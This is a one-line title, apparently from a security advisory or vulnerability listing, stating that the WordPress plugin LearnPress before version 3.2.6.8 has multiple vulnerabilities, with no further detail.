WordPress Plugin 'LearnPress' < 3.2.6.8 Multiple Vulnerabilities